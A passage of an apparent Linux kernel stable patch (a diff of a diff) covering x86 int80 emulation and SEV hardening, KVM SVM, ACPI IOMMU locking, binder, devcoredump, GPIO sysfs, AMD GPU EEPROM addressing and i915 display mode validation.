++		return;
++
+ 	on_each_cpu(zenbleed_check_cpu, NULL, 1);
+ }
+ 
+diff --git a/arch/x86/kernel/idt.c b/arch/x86/kernel/idt.c
+index a58c6bc1cd68c..f5a3374e62cb1 100644
+--- a/arch/x86/kernel/idt.c
++++ b/arch/x86/kernel/idt.c
+@@ -117,7 +117,7 @@ static const __initconst struct idt_data def_idts[] = {
+ 
+ 	SYSG(X86_TRAP_OF,		asm_exc_overflow),
+ #if defined(CONFIG_IA32_EMULATION)
+-	SYSG(IA32_SYSCALL_VECTOR,	entry_INT80_compat),
++	SYSG(IA32_SYSCALL_VECTOR,	asm_int80_emulation),
+ #elif defined(CONFIG_X86_32)
+ 	SYSG(IA32_SYSCALL_VECTOR,	entry_INT80_32),
+ #endif
+diff --git a/arch/x86/kernel/sev.c b/arch/x86/kernel/sev.c
+index 68b2a9d3dbc6b..c8dfb0fdde7f9 100644
+--- a/arch/x86/kernel/sev.c
++++ b/arch/x86/kernel/sev.c
+@@ -1279,10 +1279,6 @@ void setup_ghcb(void)
+ 	if (!cc_platform_has(CC_ATTR_GUEST_STATE_ENCRYPT))
+ 		return;
+ 
+-	/* First make sure the hypervisor talks a supported protocol. */
+-	if (!sev_es_negotiate_protocol())
+-		sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
+-
+ 	/*
+ 	 * Check whether the runtime #VC exception handler is active. It uses
+ 	 * the per-CPU GHCB page which is set up by sev_es_init_vc_handling().
+@@ -1297,6 +1293,13 @@ void setup_ghcb(void)
+ 		return;
+ 	}
+ 
++	/*
++	 * Make sure the hypervisor talks a supported protocol.
++	 * This gets called only in the BSP boot phase.
++	 */
++	if (!sev_es_negotiate_protocol())
++		sev_es_terminate(SEV_TERM_SET_GEN, GHCB_SEV_ES_GEN_REQ);
++
+ 	/*
+ 	 * Clear the boot_ghcb. The first exception comes in before the bss
+ 	 * section is cleared.
+diff --git a/arch/x86/kvm/svm/svm.c b/arch/x86/kvm/svm/svm.c
+index 4194aa4c5f0e0..4a663812562db 100644
+--- a/arch/x86/kvm/svm/svm.c
++++ b/arch/x86/kvm/svm/svm.c
+@@ -1786,15 +1786,17 @@ void svm_set_cr0(struct kvm_vcpu *vcpu, unsigned long cr0)
+ 	bool old_paging = is_paging(vcpu);
+ 
+ #ifdef CONFIG_X86_64
+-	if (vcpu->arch.efer & EFER_LME && !vcpu->arch.guest_state_protected) {
++	if (vcpu->arch.efer & EFER_LME) {
+ 		if (!is_paging(vcpu) && (cr0 & X86_CR0_PG)) {
+ 			vcpu->arch.efer |= EFER_LMA;
+-			svm->vmcb->save.efer |= EFER_LMA | EFER_LME;
++			if (!vcpu->arch.guest_state_protected)
++				svm->vmcb->save.efer |= EFER_LMA | EFER_LME;
+ 		}
+ 
+ 		if (is_paging(vcpu) && !(cr0 & X86_CR0_PG)) {
+ 			vcpu->arch.efer &= ~EFER_LMA;
+-			svm->vmcb->save.efer &= ~(EFER_LMA | EFER_LME);
++			if (!vcpu->arch.guest_state_protected)
++				svm->vmcb->save.efer &= ~(EFER_LMA | EFER_LME);
+ 		}
+ 	}
+ #endif
+diff --git a/arch/x86/mm/mem_encrypt_amd.c b/arch/x86/mm/mem_encrypt_amd.c
+index 3ea0f763540a4..3e93af083e037 100644
+--- a/arch/x86/mm/mem_encrypt_amd.c
++++ b/arch/x86/mm/mem_encrypt_amd.c
+@@ -34,6 +34,7 @@
+ #include <asm/msr.h>
+ #include <asm/cmdline.h>
+ #include <asm/sev.h>
++#include <asm/ia32.h>
+ 
+ #include "mm_internal.h"
+ 
+@@ -502,6 +503,16 @@ void __init sme_early_init(void)
+ 	x86_platform.guest.enc_status_change_finish  = amd_enc_status_change_finish;
+ 	x86_platform.guest.enc_tlb_flush_required    = amd_enc_tlb_flush_required;
+ 	x86_platform.guest.enc_cache_flush_required  = amd_enc_cache_flush_required;
++
++	/*
++	 * The VMM is capable of injecting interrupt 0x80 and triggering the
++	 * compatibility syscall path.
++	 *
++	 * By default, the 32-bit emulation is disabled in order to ensure
++	 * the safety of the VM.
++	 */
++	if (sev_status & MSR_AMD64_SEV_ENABLED)
++		ia32_disable();
+ }
+ 
+ void __init mem_encrypt_free_decrypted_mem(void)
+diff --git a/arch/x86/xen/enlighten_pv.c b/arch/x86/xen/enlighten_pv.c
+index 333539bdbdaae..9280e15de3af5 100644
+--- a/arch/x86/xen/enlighten_pv.c
++++ b/arch/x86/xen/enlighten_pv.c
+@@ -623,7 +623,7 @@ static struct trap_array_entry trap_array[] = {
+ 	TRAP_ENTRY(exc_int3,				false ),
+ 	TRAP_ENTRY(exc_overflow,			false ),
+ #ifdef CONFIG_IA32_EMULATION
+-	{ entry_INT80_compat,          xen_entry_INT80_compat,          false },
++	TRAP_ENTRY(int80_emulation,			false ),
+ #endif
+ 	TRAP_ENTRY(exc_page_fault,			false ),
+ 	TRAP_ENTRY(exc_divide_error,			false ),
+diff --git a/arch/x86/xen/xen-asm.S b/arch/x86/xen/xen-asm.S
+index 6b4fdf6b95422..dec5e03e7a2cf 100644
+--- a/arch/x86/xen/xen-asm.S
++++ b/arch/x86/xen/xen-asm.S
+@@ -156,7 +156,7 @@ xen_pv_trap asm_xenpv_exc_machine_check
+ #endif /* CONFIG_X86_MCE */
+ xen_pv_trap asm_exc_simd_coprocessor_error
+ #ifdef CONFIG_IA32_EMULATION
+-xen_pv_trap entry_INT80_compat
++xen_pv_trap asm_int80_emulation
+ #endif
+ xen_pv_trap asm_exc_xen_unknown_trap
+ xen_pv_trap asm_exc_xen_hypervisor_callback
+diff --git a/drivers/acpi/scan.c b/drivers/acpi/scan.c
+index a0e347f6f97eb..94154a849a3ea 100644
+--- a/drivers/acpi/scan.c
++++ b/drivers/acpi/scan.c
+@@ -1563,17 +1563,22 @@ static const struct iommu_ops *acpi_iommu_configure_id(struct device *dev,
+ 	int err;
+ 	const struct iommu_ops *ops;
+ 
++	/* Serialise to make dev->iommu stable under our potential fwspec */
++	mutex_lock(&iommu_probe_device_lock);
+ 	/*
+ 	 * If we already translated the fwspec there is nothing left to do,
+ 	 * return the iommu_ops.
+ 	 */
+ 	ops = acpi_iommu_fwspec_ops(dev);
+-	if (ops)
++	if (ops) {
++		mutex_unlock(&iommu_probe_device_lock);
+ 		return ops;
++	}
+ 
+ 	err = iort_iommu_configure_id(dev, id_in);
+ 	if (err && err != -EPROBE_DEFER)
+ 		err = viot_iommu_configure(dev);
++	mutex_unlock(&iommu_probe_device_lock);
+ 
+ 	/*
+ 	 * If we have reason to believe the IOMMU driver missed the initial
+diff --git a/drivers/android/binder.c b/drivers/android/binder.c
+index e4a6da81cd4b3..9cc3a2b1b4fc1 100644
+--- a/drivers/android/binder.c
++++ b/drivers/android/binder.c
+@@ -4788,6 +4788,7 @@ static void binder_release_work(struct binder_proc *proc,
+ 				"undelivered TRANSACTION_ERROR: %u\n",
+ 				e->cmd);
+ 		} break;
++		case BINDER_WORK_TRANSACTION_ONEWAY_SPAM_SUSPECT:
+ 		case BINDER_WORK_TRANSACTION_COMPLETE: {
+ 			binder_debug(BINDER_DEBUG_DEAD_TRANSACTION,
+ 				"undelivered TRANSACTION_COMPLETE\n");
+diff --git a/drivers/base/devcoredump.c b/drivers/base/devcoredump.c
+index 1c06781f71148..f3bd9f104bd12 100644
+--- a/drivers/base/devcoredump.c
++++ b/drivers/base/devcoredump.c
+@@ -363,6 +363,7 @@ void dev_coredumpm(struct device *dev, struct module *owner,
+ 	devcd->devcd_dev.class = &devcd_class;
+ 
+ 	mutex_lock(&devcd->mutex);
++	dev_set_uevent_suppress(&devcd->devcd_dev, true);
+ 	if (device_add(&devcd->devcd_dev))
+ 		goto put_device;
+ 
+@@ -377,6 +378,8 @@ void dev_coredumpm(struct device *dev, struct module *owner,
+ 		              "devcoredump"))
+ 		dev_warn(dev, "devcoredump create_link failed\n");
+ 
++	dev_set_uevent_suppress(&devcd->devcd_dev, false);
++	kobject_uevent(&devcd->devcd_dev.kobj, KOBJ_ADD);
+ 	INIT_DELAYED_WORK(&devcd->del_wk, devcd_del);
+ 	schedule_delayed_work(&devcd->del_wk, DEVCD_TIMEOUT);
+ 	mutex_unlock(&devcd->mutex);
+diff --git a/drivers/base/regmap/regcache.c b/drivers/base/regmap/regcache.c
+index cf3fa998093de..4f3dd9316fb2f 100644
+--- a/drivers/base/regmap/regcache.c
++++ b/drivers/base/regmap/regcache.c
+@@ -410,8 +410,7 @@ out:
+ 			rb_entry(node, struct regmap_range_node, node);
+ 
+ 		/* If there's nothing in the cache there's nothing to sync */
+-		ret = regcache_read(map, this->selector_reg, &i);
+-		if (ret != 0)
++		if (regcache_read(map, this->selector_reg, &i) != 0)
+ 			continue;
+ 
+ 		ret = _regmap_write(map, this->selector_reg, i);
+diff --git a/drivers/gpio/gpiolib-sysfs.c b/drivers/gpio/gpiolib-sysfs.c
+index cd27bf173dec8..a64648682c72c 100644
+--- a/drivers/gpio/gpiolib-sysfs.c
++++ b/drivers/gpio/gpiolib-sysfs.c
+@@ -463,14 +463,17 @@ static ssize_t export_store(struct class *class,
+ 		goto done;
+ 
+ 	status = gpiod_set_transitory(desc, false);
+-	if (!status) {
+-		status = gpiod_export(desc, true);
+-		if (status < 0)
+-			gpiod_free(desc);
+-		else
+-			set_bit(FLAG_SYSFS, &desc->flags);
++	if (status) {
++		gpiod_free(desc);
++		goto done;
+ 	}
+ 
++	status = gpiod_export(desc, true);
++	if (status < 0)
++		gpiod_free(desc);
++	else
++		set_bit(FLAG_SYSFS, &desc->flags);
++
+ done:
+ 	if (status)
+ 		pr_debug("%s: status %d\n", __func__, status);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+index ced4e7e8f98b5..133e4e03c143c 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_cs.c
+@@ -201,7 +201,7 @@ static int amdgpu_cs_pass1(struct amdgpu_cs_parser *p,
+ 	}
+ 
+ 	for (i = 0; i < p->nchunks; i++) {
+-		struct drm_amdgpu_cs_chunk __user **chunk_ptr = NULL;
++		struct drm_amdgpu_cs_chunk __user *chunk_ptr = NULL;
+ 		struct drm_amdgpu_cs_chunk user_chunk;
+ 		uint32_t __user *cdata;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+index 2fced451f0aea..aabde6ebb190e 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_display.c
+@@ -90,7 +90,7 @@ static void amdgpu_display_flip_work_func(struct work_struct *__work)
+ 
+ 	struct drm_crtc *crtc = &amdgpu_crtc->base;
+ 	unsigned long flags;
+-	unsigned i;
++	unsigned int i;
+ 	int vpos, hpos;
+ 
+ 	for (i = 0; i < work->shared_count; ++i)
+@@ -167,7 +167,7 @@ int amdgpu_display_crtc_page_flip_target(struct drm_crtc *crtc,
+ 	u64 tiling_flags;
+ 	int i, r;
+ 
+-	work = kzalloc(sizeof *work, GFP_KERNEL);
++	work = kzalloc(sizeof(*work), GFP_KERNEL);
+ 	if (work == NULL)
+ 		return -ENOMEM;
+ 
+@@ -298,18 +298,17 @@ int amdgpu_display_crtc_set_config(struct drm_mode_set *set,
+ 
+ 	adev = drm_to_adev(dev);
+ 	/* if we have active crtcs and we don't have a power ref,
+-	   take the current one */
++	 * take the current one
++	 */
+ 	if (active && !adev->have_disp_power_ref) {
+ 		adev->have_disp_power_ref = true;
+ 		return ret;
+ 	}
+-	/* if we have no active crtcs, then drop the power ref
+-	   we got before */
+-	if (!active && adev->have_disp_power_ref) {
+-		pm_runtime_put_autosuspend(dev->dev);
++	/* if we have no active crtcs, then go to
++	 * drop the power ref we got before
++	 */
++	if (!active && adev->have_disp_power_ref)
+ 		adev->have_disp_power_ref = false;
+-	}
+-
+ out:
+ 	/* drop the power reference we got coming in here */
+ 	pm_runtime_put_autosuspend(dev->dev);
+@@ -473,11 +472,10 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	if (amdgpu_connector->router.ddc_valid)
+ 		amdgpu_i2c_router_select_ddc_port(amdgpu_connector);
+ 
+-	if (use_aux) {
++	if (use_aux)
+ 		ret = i2c_transfer(&amdgpu_connector->ddc_bus->aux.ddc, msgs, 2);
+-	} else {
++	else
+ 		ret = i2c_transfer(&amdgpu_connector->ddc_bus->adapter, msgs, 2);
+-	}
+ 
+ 	if (ret != 2)
+ 		/* Couldn't find an accessible DDC on this connector */
+@@ -486,10 +484,12 @@ bool amdgpu_display_ddc_probe(struct amdgpu_connector *amdgpu_connector,
+ 	 * EDID header starts with:
+ 	 * 0x00,0xFF,0xFF,0xFF,0xFF,0xFF,0xFF,0x00.
+ 	 * Only the first 6 bytes must be valid as
+-	 * drm_edid_block_valid() can fix the last 2 bytes */
++	 * drm_edid_block_valid() can fix the last 2 bytes
++	 */
+ 	if (drm_edid_header_is_valid(buf) < 6) {
+ 		/* Couldn't find an accessible EDID on this
+-		 * connector */
++		 * connector
++		 */
+ 		return false;
+ 	}
+ 	return true;
+@@ -1204,8 +1204,10 @@ amdgpu_display_user_framebuffer_create(struct drm_device *dev,
+ 
+ 	obj = drm_gem_object_lookup(file_priv, mode_cmd->handles[0]);
+ 	if (obj ==  NULL) {
+-		drm_dbg_kms(dev, "No GEM object associated to handle 0x%08X, "
+-			    "can't create framebuffer\n", mode_cmd->handles[0]);
++		drm_dbg_kms(dev,
++			    "No GEM object associated to handle 0x%08X, can't create framebuffer\n",
++			    mode_cmd->handles[0]);
++
+ 		return ERR_PTR(-ENOENT);
+ 	}
+ 
+@@ -1398,6 +1400,7 @@ bool amdgpu_display_crtc_scaling_mode_fixup(struct drm_crtc *crtc,
+ 	}
+ 	if (amdgpu_crtc->rmx_type != RMX_OFF) {
+ 		fixed20_12 a, b;
++
+ 		a.full = dfixed_const(src_v);
+ 		b.full = dfixed_const(dst_v);
+ 		amdgpu_crtc->vsc.full = dfixed_div(a, b);
+@@ -1417,7 +1420,7 @@ bool amdgpu_display_crtc_scaling_mode_fixup(struct drm_crtc *crtc,
+  *
+  * \param dev Device to query.
+  * \param pipe Crtc to query.
+- * \param flags Flags from caller (DRM_CALLED_FROM_VBLIRQ or 0).
++ * \param flags from caller (DRM_CALLED_FROM_VBLIRQ or 0).
+  *              For driver internal use only also supports these flags:
+  *
+  *              USE_REAL_VBLANKSTART to use the real start of vblank instead
+@@ -1493,8 +1496,8 @@ int amdgpu_display_get_crtc_scanoutpos(struct drm_device *dev,
+ 
+ 	/* Called from driver internal vblank counter query code? */
+ 	if (flags & GET_DISTANCE_TO_VBLANKSTART) {
+-	    /* Caller wants distance from real vbl_start in *hpos */
+-	    *hpos = *vpos - vbl_start;
++		/* Caller wants distance from real vbl_start in *hpos */
++		*hpos = *vpos - vbl_start;
+ 	}
+ 
+ 	/* Fudge vblank to start a few scanlines earlier to handle the
+@@ -1516,7 +1519,7 @@ int amdgpu_display_get_crtc_scanoutpos(struct drm_device *dev,
+ 
+ 	/* In vblank? */
+ 	if (in_vbl)
+-	    ret |= DRM_SCANOUTPOS_IN_VBLANK;
++		ret |= DRM_SCANOUTPOS_IN_VBLANK;
+ 
+ 	/* Called from driver internal vblank counter query code? */
+ 	if (flags & GET_DISTANCE_TO_VBLANKSTART) {
+@@ -1622,6 +1625,7 @@ int amdgpu_display_suspend_helper(struct amdgpu_device *adev)
+ 
+ 		if (amdgpu_crtc->cursor_bo && !adev->enable_virtual_display) {
+ 			struct amdgpu_bo *aobj = gem_to_amdgpu_bo(amdgpu_crtc->cursor_bo);
++
+ 			r = amdgpu_bo_reserve(aobj, true);
+ 			if (r == 0) {
+ 				amdgpu_bo_unpin(aobj);
+@@ -1629,9 +1633,9 @@ int amdgpu_display_suspend_helper(struct amdgpu_device *adev)
+ 			}
+ 		}
+ 
+-		if (fb == NULL || fb->obj[0] == NULL) {
++		if (!fb || !fb->obj[0])
+ 			continue;
+-		}
++
+ 		robj = gem_to_amdgpu_bo(fb->obj[0]);
+ 		if (!amdgpu_display_robj_is_fb(adev, robj)) {
+ 			r = amdgpu_bo_reserve(robj, true);
+@@ -1658,6 +1662,7 @@ int amdgpu_display_resume_helper(struct amdgpu_device *adev)
+ 
+ 		if (amdgpu_crtc->cursor_bo && !adev->enable_virtual_display) {
+ 			struct amdgpu_bo *aobj = gem_to_amdgpu_bo(amdgpu_crtc->cursor_bo);
++
+ 			r = amdgpu_bo_reserve(aobj, true);
+ 			if (r == 0) {
+ 				r = amdgpu_bo_pin(aobj, AMDGPU_GEM_DOMAIN_VRAM);
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+index 4d9eb0137f8c4..d6c4293829aab 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_eeprom.c
+@@ -79,6 +79,8 @@
+  * That is, for an I2C EEPROM driver everything is controlled by
+  * the "eeprom_addr".
+  *
++ * See also top of amdgpu_ras_eeprom.c.
++ *
+  * P.S. If you need to write, lock and read the Identification Page,
+  * (M24M02-DR device only, which we do not use), change the "7" to
+  * "0xF" in the macro below, and let the client set bit 20 to 1 in
+diff --git a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
+index 84c241b9a2a13..f5f747cfe90a1 100644
+--- a/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
++++ b/drivers/gpu/drm/amd/amdgpu/amdgpu_ras_eeprom.c
+@@ -33,12 +33,29 @@
+ 
+ #include "amdgpu_reset.h"
+ 
+-#define EEPROM_I2C_MADDR_VEGA20         0x0
+-#define EEPROM_I2C_MADDR_ARCTURUS       0x40000
+-#define EEPROM_I2C_MADDR_ARCTURUS_D342  0x0
+-#define EEPROM_I2C_MADDR_SIENNA_CICHLID 0x0
+-#define EEPROM_I2C_MADDR_ALDEBARAN      0x0
+-#define EEPROM_I2C_MADDR_SMU_13_0_0     (0x54UL << 16)
++/* These are memory addresses as would be seen by one or more EEPROM
++ * chips strung on the I2C bus, usually by manipulating pins 1-3 of a
++ * set of EEPROM devices. They form a continuous memory space.
++ *
++ * The I2C device address includes the device type identifier, 1010b,
++ * which is a reserved value and indicates that this is an I2C EEPROM
++ * device. It also includes the top 3 bits of the 19 bit EEPROM memory
++ * address, namely bits 18, 17, and 16. This makes up the 7 bit
++ * address sent on the I2C bus with bit 0 being the direction bit,
++ * which is not represented here, and sent by the hardware directly.
++ *
++ * For instance,
++ *   50h = 1010000b => device type identifier 1010b, bits 18:16 = 000b, address 0.
++ *   54h = 1010100b => --"--, bits 18:16 = 100b, address 40000h.
++ *   56h = 1010110b => --"--, bits 18:16 = 110b, address 60000h.
++ * Depending on the size of the I2C EEPROM device(s), bits 18:16 may
++ * address memory in a device or a device on the I2C bus, depending on
++ * the status of pins 1-3. See top of amdgpu_eeprom.c.
++ *
++ * The RAS table lives either at address 0 or address 40000h of EEPROM.
++ */
++#define EEPROM_I2C_MADDR_0      0x0
++#define EEPROM_I2C_MADDR_4      0x40000
+ 
+ /*
+  * The 2 macros bellow represent the actual size in bytes that
+@@ -90,33 +107,23 @@
+ 
+ static bool __is_ras_eeprom_supported(struct amdgpu_device *adev)
+ {
+-	return  adev->asic_type == CHIP_VEGA20 ||
+-		adev->asic_type == CHIP_ARCTURUS ||
+-		adev->asic_type == CHIP_SIENNA_CICHLID ||
+-		adev->asic_type == CHIP_ALDEBARAN;
+-}
+-
+-static bool __get_eeprom_i2c_addr_arct(struct amdgpu_device *adev,
+-				       struct amdgpu_ras_eeprom_control *control)
+-{
+-	struct atom_context *atom_ctx = adev->mode_info.atom_context;
+-
+-	if (!control || !atom_ctx)
++	switch (adev->ip_versions[MP1_HWIP][0]) {
++	case IP_VERSION(11, 0, 2): /* VEGA20 and ARCTURUS */
++	case IP_VERSION(11, 0, 7): /* Sienna cichlid */
++	case IP_VERSION(13, 0, 0):
++	case IP_VERSION(13, 0, 2): /* Aldebaran */
++	case IP_VERSION(13, 0, 6):
++	case IP_VERSION(13, 0, 10):
++		return true;
++	default:
+ 		return false;
+-
+-	if (strnstr(atom_ctx->vbios_version,
+-	            "D342",
+-		    sizeof(atom_ctx->vbios_version)))
+-		control->i2c_address = EEPROM_I2C_MADDR_ARCTURUS_D342;
+-	else
+-		control->i2c_address = EEPROM_I2C_MADDR_ARCTURUS;
+-
+-	return true;
++	}
+ }
+ 
+ static bool __get_eeprom_i2c_addr(struct amdgpu_device *adev,
+ 				  struct amdgpu_ras_eeprom_control *control)
+ {
++	struct atom_context *atom_ctx = adev->mode_info.atom_context;
+ 	u8 i2c_addr;
+ 
+ 	if (!control)
+@@ -137,36 +144,42 @@ static bool __get_eeprom_i2c_addr(struct amdgpu_device *adev,
+ 		return true;
+ 	}
+ 
+-	switch (adev->asic_type) {
+-	case CHIP_VEGA20:
+-		control->i2c_address = EEPROM_I2C_MADDR_VEGA20;
+-		break;
+-
+-	case CHIP_ARCTURUS:
+-		return __get_eeprom_i2c_addr_arct(adev, control);
+-
+-	case CHIP_SIENNA_CICHLID:
+-		control->i2c_address = EEPROM_I2C_MADDR_SIENNA_CICHLID;
+-		break;
+-
+-	case CHIP_ALDEBARAN:
+-		control->i2c_address = EEPROM_I2C_MADDR_ALDEBARAN;
+-		break;
+-
+-	default:
+-		return false;
+-	}
+-
+ 	switch (adev->ip_versions[MP1_HWIP][0]) {
++	case IP_VERSION(11, 0, 2):
++		/* VEGA20 and ARCTURUS */
++		if (adev->asic_type == CHIP_VEGA20)
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else if (strnstr(atom_ctx->vbios_version,
++				 "D342",
++				 sizeof(atom_ctx->vbios_version)))
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
++	case IP_VERSION(11, 0, 7):
++		control->i2c_address = EEPROM_I2C_MADDR_0;
++		return true;
++	case IP_VERSION(13, 0, 2):
++		if (strnstr(atom_ctx->vbios_version, "D673",
++			    sizeof(atom_ctx->vbios_version)))
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		return true;
+ 	case IP_VERSION(13, 0, 0):
+-		control->i2c_address = EEPROM_I2C_MADDR_SMU_13_0_0;
+-		break;
+-
++		if (strnstr(atom_ctx->vbios_pn, "D707",
++			    sizeof(atom_ctx->vbios_pn)))
++			control->i2c_address = EEPROM_I2C_MADDR_0;
++		else
++			control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
++	case IP_VERSION(13, 0, 6):
++	case IP_VERSION(13, 0, 10):
++		control->i2c_address = EEPROM_I2C_MADDR_4;
++		return true;
+ 	default:
+-		break;
++		return false;
+ 	}
+-
+-	return true;
+ }
+ 
+ static void
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+index 23e7e5126eae6..66a6f7a37ebcf 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v11_0.c
+@@ -397,7 +397,7 @@ static int gfx_v11_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 		adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 		cpu_ptr = &adev->wb.wb[index];
+ 
+-		r = amdgpu_ib_get(adev, NULL, 16, AMDGPU_IB_POOL_DIRECT, &ib);
++		r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 		if (r) {
+ 			DRM_ERROR("amdgpu: failed to get ib (%ld).\n", r);
+ 			goto err1;
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
+index 7f0b18b0d4c48..71ef25425c7f6 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v8_0.c
+@@ -883,8 +883,8 @@ static int gfx_v8_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 	gpu_addr = adev->wb.gpu_addr + (index * 4);
+ 	adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 	memset(&ib, 0, sizeof(ib));
+-	r = amdgpu_ib_get(adev, NULL, 16,
+-					AMDGPU_IB_POOL_DIRECT, &ib);
++
++	r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 	if (r)
+ 		goto err1;
+ 
+diff --git a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+index fe371022e5104..84ca601f7d5f3 100644
+--- a/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
++++ b/drivers/gpu/drm/amd/amdgpu/gfx_v9_0.c
+@@ -1034,8 +1034,8 @@ static int gfx_v9_0_ring_test_ib(struct amdgpu_ring *ring, long timeout)
+ 	gpu_addr = adev->wb.gpu_addr + (index * 4);
+ 	adev->wb.wb[index] = cpu_to_le32(0xCAFEDEAD);
+ 	memset(&ib, 0, sizeof(ib));
+-	r = amdgpu_ib_get(adev, NULL, 16,
+-					AMDGPU_IB_POOL_DIRECT, &ib);
++
++	r = amdgpu_ib_get(adev, NULL, 20, AMDGPU_IB_POOL_DIRECT, &ib);
+ 	if (r)
+ 		goto err1;
+ 
+diff --git a/drivers/gpu/drm/bridge/Kconfig b/drivers/gpu/drm/bridge/Kconfig
+index 57946d80b02db..12baf9ba03c96 100644
+--- a/drivers/gpu/drm/bridge/Kconfig
++++ b/drivers/gpu/drm/bridge/Kconfig
+@@ -309,6 +309,7 @@ config DRM_TOSHIBA_TC358768
+ 	select REGMAP_I2C
+ 	select DRM_PANEL
+ 	select DRM_MIPI_DSI
++	select VIDEOMODE_HELPERS
+ 	help
+ 	  Toshiba TC358768AXBG/TC358778XBG DSI bridge chip driver.
+ 
+diff --git a/drivers/gpu/drm/i915/display/icl_dsi.c b/drivers/gpu/drm/i915/display/icl_dsi.c
+index 8219310025de5..f7422f0cf579d 100644
+--- a/drivers/gpu/drm/i915/display/icl_dsi.c
++++ b/drivers/gpu/drm/i915/display/icl_dsi.c
+@@ -1500,6 +1500,13 @@ static void gen11_dsi_post_disable(struct intel_atomic_state *state,
+ static enum drm_mode_status gen11_dsi_mode_valid(struct drm_connector *connector,
+ 						 struct drm_display_mode *mode)
+ {
++	struct drm_i915_private *i915 = to_i915(connector->dev);
++	enum drm_mode_status status;
++
++	status = intel_cpu_transcoder_mode_valid(i915, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	/* FIXME: DSC? */
+ 	return intel_dsi_mode_valid(connector, mode);
+ }
+diff --git a/drivers/gpu/drm/i915/display/intel_crt.c b/drivers/gpu/drm/i915/display/intel_crt.c
+index 4a8ff2f976085..e60b2cf84b851 100644
+--- a/drivers/gpu/drm/i915/display/intel_crt.c
++++ b/drivers/gpu/drm/i915/display/intel_crt.c
+@@ -343,8 +343,13 @@ intel_crt_mode_valid(struct drm_connector *connector,
+ 	struct drm_device *dev = connector->dev;
+ 	struct drm_i915_private *dev_priv = to_i915(dev);
+ 	int max_dotclk = dev_priv->max_dotclk_freq;
++	enum drm_mode_status status;
+ 	int max_clock;
+ 
++	status = intel_cpu_transcoder_mode_valid(dev_priv, mode);
++	if (status != MODE_OK)
++		return status;
++
+ 	if (mode->flags & DRM_MODE_FLAG_DBLSCAN)
+ 		return MODE_NO_DBLESCAN;
+ 
+diff --git a/drivers/gpu/drm/i915/display/intel_display.c b/drivers/gpu/drm/i915/display/intel_display.c
+index 96e679a176e94..1777a12f2f421 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.c
++++ b/drivers/gpu/drm/i915/display/intel_display.c
+@@ -8229,6 +8229,16 @@ intel_mode_valid(struct drm_device *dev,
+ 	    mode->vtotal > vtotal_max)
+ 		return MODE_V_ILLEGAL;
+ 
++	return MODE_OK;
++}
++
++enum drm_mode_status intel_cpu_transcoder_mode_valid(struct drm_i915_private *dev_priv,
++						     const struct drm_display_mode *mode)
++{
++	/*
++	 * Additional transcoder timing limits,
++	 * excluding BXT/GLK DSI transcoders.
++	 */
+ 	if (DISPLAY_VER(dev_priv) >= 5) {
+ 		if (mode->hdisplay < 64 ||
+ 		    mode->htotal - mode->hdisplay < 32)
+diff --git a/drivers/gpu/drm/i915/display/intel_display.h b/drivers/gpu/drm/i915/display/intel_display.h
+index 884e8e67b17c7..b4f941674357b 100644
+--- a/drivers/gpu/drm/i915/display/intel_display.h
++++ b/drivers/gpu/drm/i915/display/intel_display.h
+@@ -554,6 +554,9 @@ enum drm_mode_status
+ intel_mode_valid_max_plane_size(struct drm_i915_private *dev_priv,
+ 				const struct drm_display_mode *mode,
+ 				bool bigjoiner);
++enum drm_mode_status
++intel_cpu_transcoder_mode_valid(struct drm_i915_private *i915,
++				const struct drm_display_mode *mode);
+ enum phy intel_port_to_phy(struct drm_i915_private *i915, enum port port);
+ bool is_trans_port_sync_mode(const struct intel_crtc_state *state);
+ bool intel_crtc_is_bigjoiner_slave(const struct intel_crtc_state *crtc_state);
+diff --git a/drivers/gpu/drm/i915/display/intel_dp.c b/drivers/gpu/drm/i915/display/intel_dp.c
+index 594ea037050a9..5970f4149090f 100644
